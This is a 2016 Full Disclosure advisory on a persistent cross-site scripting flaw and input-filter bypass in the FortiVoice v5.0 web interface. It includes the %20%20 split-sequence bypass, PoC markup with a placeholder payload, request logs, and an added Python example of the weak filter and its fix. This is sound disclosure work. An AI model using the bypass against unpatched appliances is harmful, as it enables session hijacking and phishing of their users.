
[FD] FortiVoice v5.0 - Filter Bypass & Persistent Validation Vulnerability



Document Title:
===============
FortiVoice v5.0 - Filter Bypass & Persistent Validation Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1842

Fortinet PSIRT ID:  1737213

Release Notes: 
http://docs.fortinet.com/uploaded/files/3081/fortiVoiceenterprise-5.0.5-release%20notes.pdf


Release Date:
=============
2016-08-09


Vulnerability Laboratory ID (VL-ID):
====================================
1842


Common Vulnerability Scoring System:
====================================
3.6


Product & Service Introduction:
===============================
FortiVoice phone systems and phones deliver intelligent call handling in a 
simple, affordable and user-friendly package. FortiVoice products are easy to 
install, easy to configure and easy to use, and come complete with everything 
a business needs to handle calls professionally, control costs and stay 
connected everywhere.

The FortiVoice Enterprise IP-PBX voice solutions are built for offices with up 
to 2000 phone users. FortiVoice Enterprise systems give you total call control 
and sophisticated communication features for excellent customer service and 
efficient employee collaboration. Powerful, affordable and simple, FortiVoice 
phone systems include everything you need to handle calls professionally, 
control communication costs and stay connected everywhere.

(Copy of the Homepage: http://www.fortivoice.com )


Abstract Advisory Information:
==============================
The vulnerability lab core team discovered multiple application-side web 
vulnerabilities in the official Fortinet FortiVoice v5.x appliance 
web-application.


Vulnerability Disclosure Timeline:
==================================
2016-05-11: Researcher Notification & Coordination (Benjamin Kunz Mejri - 
Evolution Security GmbH)
2016-05-12: Vendor Notification (PSIRT - Fortinet Security Team)
2016-06-26: Vendor Fix/Patch (Fortinet Developer Team)
2016-07-09: Acknowledgements (Fortiguard Security Team)
2016-08-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Fortinet
Product: FortiVoice - Appliance (Web-Application) 5.0 (5.x) - FVE-20E2/4, 100E, 
300E-T, 500E-T2, 1000E, 1000E-


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A filter bypass and multiple persistent cross-site scripting vulnerabilities 
have been discovered in the FortiVoice v5.x appliance web-application. The 
application-side issue allows remote attackers to inject their own malicious 
script code into the affected modules.

The vulnerabilities are located in the `match pattern name` input fields of the 
`Outbound - Outbound - Dialed Number Match` and 
`Call Features - Fax - Sending Rules - Dialed Number Match` modules. Local 
low-privileged user accounts and remote attackers are able to inject their own 
malicious script code into the vulnerable modules via POST requests. The attack 
vector of the issue is persistent on the application side. The injection points 
are the vulnerable input fields, and the execution point lies mainly in the 
context of the same web modules.

The validation attempts to encode strings on input. To bypass the validation of 
the FortiVoice appliance web-application, a split-character sequence has to be 
inserted via the input field: after, for example, %20%20 the validation stops 
encoding, and the remainder of the value is stored and rendered as-is, so a 
payload placed after the sequence executes.

The security risk of the application-side cross-site scripting vulnerabilities 
is estimated as medium with a CVSS (Common Vulnerability Scoring System) count 
of 3.6. Exploitation of the persistent input validation web vulnerability 
requires a low-privileged web-application user account (but is not limited to 
one) and low or medium user interaction. Successful exploitation of the 
vulnerability results in session hijacking, persistent phishing attacks, 
persistent external redirects to malicious sources and persistent manipulation 
of affected or connected application modules.

Request Method(s):
    [+] POST

Vulnerable Module(s):
    [+] Outbound - Outbound
    [+] Call Features - Fax - Sending Rules

Vulnerable Parameter(s):
    [+] name (match pattern)

Affected Module(s):
    [+] Dialed Number Match


Proof of Concept (PoC):
=======================
The persistent cross-site scripting vulnerabilities can be exploited by remote 
attackers and low-privileged web-application user accounts with low or medium 
user interaction. For a security demonstration, or to reproduce the web 
vulnerability, follow the information and steps provided below.


Vulnerable Location(s):
Outbound - Outbound - Dialed Number Match [Match Pattern - Name]
Call Features - Fax - Sending Rules - Dialed Number Match [Match Pattern - Name]


PoC: Outbound - Outbound - Dialed Number Match [Match Pattern - Name]
<div class="x-clear"></div></div><div style="overflow: visible;" 
id="ext-gen14302" class="x-grid3-scroller">
<div id="ext-gen14303" class="x-grid3-body"><div id="ext-gen17482" 
class="x-grid3-row x-grid3-row-selected " style="width:570px;">
<table class="x-grid3-row-table" style="width:570px;" border="0" 
cellpadding="0" cellspacing="0">
<tbody><tr><td id="ext-gen23162" class="x-grid3-col x-grid3-cell 
x-grid3-td-pattern x-grid3-cell-first " 
style="width:238px;" tabindex="0"><div id="ext-gen17483" 
class="x-grid3-cell-inner x-grid3-col-pattern" unselectable="on" 
ext:qtip="&quot;><[MALICIOUS INJECTED SCRIPT CODE EXECUTION!] id="ext-gen17484" 
src="a">%20>"<iframe>%20><img></div></td>
<td class="x-grid3-col x-grid3-cell x-grid3-td-strip " style="width:43px;" 
tabIndex="0" ><div class="x-grid3-cell-inner 
x-grid3-col-strip" unselectable="on" >-152725276</div></td><td 
class="x-grid3-col x-grid3-cell x-grid3-td-prefix " 
style="width:43px;" tabIndex="0" ><div class="x-grid3-cell-inner 
x-grid3-col-prefix" 
unselectable="on" >&quot;&gt;&lt;[MALICIOUS INJECTED SCRIPT CODE 
EXECUTION!]</div></td><td class="x-grid3-col x-grid3-cell 
x-grid3-td-postfix x-grid3-cell-last " style="width:238px;" tabIndex="0" ><div 
class="x-grid3-cell-inner x-grid3-col-postfix" 
unselectable="on" >&quot;&gt;&lt;[MALICIOUS INJECTED SCRIPT CODE 
EXECUTION!]</div></td></tr></tbody></table></div></iframe>
</div></td></tr></tbody></table></div></div>
<a style="left: -181px; top: 0px;" id="ext-gen14304" href="#" 
class="x-grid3-focus" tabindex="-1"></a></div></div>
<div id="ext-gen14306" class="x-grid3-resize-marker">&nbsp;</div><div 
id="ext-gen14307" class="x-grid3-resize-proxy">
&nbsp;</div></div></div></div></div></td></tr></tbody></table></div>
</div></div></td></tr></tbody></table></div></div></div></div></div></fieldset>


--- PoC Session Logs [POST] (Inject) ---
Status: 200[OK]
POST https://fortivoice.localhost:8000/module/admin.fe
   Request Header:
      Host[fortivoice.localhost:8000]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 
Firefox/45.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[https://fortivoice.localhost:8000/admin/Admin.html]
      
Cookie[APSCOOKIE=Era%3D0%26Payload%3DBUDPevZ3vu6oNvnzczgUZUxDVECqaIRVjn889mdYzxdkD4%2FA45QQcLjmgW04i4Z3%0AS9YooynCQQOQN%2B
      
keLze0Uuzs7ouriyz3ovTUWG%2BunEkgcKq3rmUHQN8V7dCGtVt8%0AuozS%2FkWaWik%3D%0A%26AuthHash%3D%2BrcDoo1VkUf9oax9JWPQbA%3D%3D%0A]
      Connection[keep-alive]
      POST-Daten:
      
fewReq[:B:JVs5MjU6OXFmckxhaWZgdz5TcWxlV3FibXBvYndmXGBib29qZyVxZnJCYHdqbG0+MSVuaGZ6PiYxMSYwRiYwQGplcWJuZiYwRiYxNjEzJjBGJjExJjBAamVxYm5m
        
KHBxYCYwR2ImMEYoKCYxMSYwRiYwQGplcWJuZiYwRiYxNjEzJjBGJjExJjBAamVxYm5mKHBxYCYwR2ImMEYlYW9sYGhcYGJvb2ZxXGpnPndxdmY=]

--- PoC Session Logs [GET] (Execution) ---
Status: 200[OK]
GET https://fortivoice.localhost:8000/admin/x[PERSISTENT INJECTED SCRIPT CODE 
EXECUTION!] 
Request Header:
      Host[fortivoice.localhost:8000]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 
Firefox/45.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[https://fortivoice.localhost:8000/admin/Admin.html]
      Cookie[fmAdmSesCurUser=demo; 
APSCOOKIE=Era%3D0%26Payload%3DBUDPevZ3vu6oNvnzczgUZUxDVECqaIRVjn889mdYzxdkD4%2FA45QQcLjmgW04i4Z3%0AS9YooynCQQOQN
                   
%2BkeLze0Uuzs7ouriyz3ovTUWG%2BunEkgcKq3rmUHQN8V7dCGtVt8%0AuozS%2FkWaWik%3D%0A%26AuthHash%3D%2BrcDoo1VkUf9oax9JWPQbA%3D%3D%0A]
      Connection[keep-alive]


Reference(s):
https://fortivoice.localhost:8000/
https://fortivoice.localhost:8000/admin/
https://fortivoice.localhost:8000/module/admin.fe
https://fortivoice.localhost:8000/admin/Admin.html


Solution - Fix & Patch:
=======================
The vulnerabilities can be patched by securely parsing and encoding the 
vulnerable output location context in the affected modules. Disallow special 
characters through input restriction to prevent further application-side 
script code injection attacks. Encode the match pattern name parameter input in 
the two affected modules to fix the vulnerabilities.

Note: The vulnerability has been patched in FortiVoice v5.0.5, and the update 
is available by automated download or manually via the Fortinet customer 
center.
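To make the fix concrete, the following is an added Python example, not Fortinet's code and not part of the original advisory: it models the weak behaviour described above (encoding on input that stops at the %20%20 split sequence and echoes the stored value into the ext:qtip attribute and cell body seen in the PoC) beside the hardened form, which validates the pattern name against an allowlist and encodes at the output location on every render. The sample name, the allowlist and the weak-filter model are constructed assumptions.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample input: a match-pattern name carrying the %20%20 split
# sequence from the advisory, URL-decoded as the form handler would see it.
SAMPLE_NAME = unquote('Sales%20%20"><iframe><img src="a">')


def weak_input_filter(value: str) -> str:
    """Model of the described weak behaviour (an assumption, not Fortinet's
    code): encode on input, but stop at the first double space, so the tail
    of the value is stored raw."""
    head, sep, tail = value.partition("  ")
    return html.escape(head, quote=True) + sep + tail


def render_weak(stored_name: str) -> str:
    """Echo the stored value into the attribute and cell contexts of the PoC."""
    return f'<div ext:qtip="{stored_name}">{stored_name}</div>'


# Hardened form. Assumed allowlist for a pattern name: letters, digits, space,
# underscore, dot and hyphen. It is character-based, so no split sequence
# (such as a double space) changes what gets accepted.
NAME_ALLOWED = re.compile(r"[A-Za-z0-9 _.-]{1,64}")


def validate_name(value: str) -> bool:
    """Reject any name containing characters outside the allowlist."""
    return NAME_ALLOWED.fullmatch(value) is not None


def render_safe(stored_name: str) -> str:
    """Encode at the output location, for the attribute context, every time.
    html.escape(quote=True) turns & < > " ' into entities, so the value can
    neither close ext:qtip nor open a tag in the cell body."""
    safe = html.escape(stored_name, quote=True)
    return f'<div ext:qtip="{safe}">{safe}</div>'


def attribute_breakout(markup: str) -> bool:
    """Detection check on rendered markup: a raw quote directly followed by a
    tag opener means the value escaped its attribute."""
    return '"><' in markup
```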


Security Risk:
==============
The security risk of the application-side input validation web vulnerabilities 
in the appliance web-application is estimated as medium. (CVSS 3.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
[http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and fitness for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability-Lab or its suppliers 
have been advised of the possibility of such damages. Some states do not allow 
the exclusion or limitation of liability for consequential or incidental 
damages, so the foregoing limitation may not apply. We do not approve or 
encourage anybody to break any licenses, policies, deface websites, hack into 
databases or trade with stolen data.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
                                - www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx         - 
research@xxxxxxxxxxxxxxxxxxxxx                                - 
admin@xxxxxxxxxxxxxxxxx
Section:    magazine.vulnerability-lab.com      - 
vulnerability-lab.com/contact.php                             - 
evolution-sec.com/contact
Social:     twitter.com/vuln_lab                - facebook.com/VulnerabilityLab 
                                - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php                    - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - 
vulnerability-lab.com/list-of-bug-bounty-programs.php         - 
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partial usage, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All 
other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website are 
trademarks of the vulnerability-lab team and the specific authors or managers. 
To record, list, modify, use or edit our material, contact 
(admin@ or research@xxxxxxxxxxxxxxxxxxxxx) to ask for permission.

                                    Copyright © 2016 | Vulnerability Laboratory 
- [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/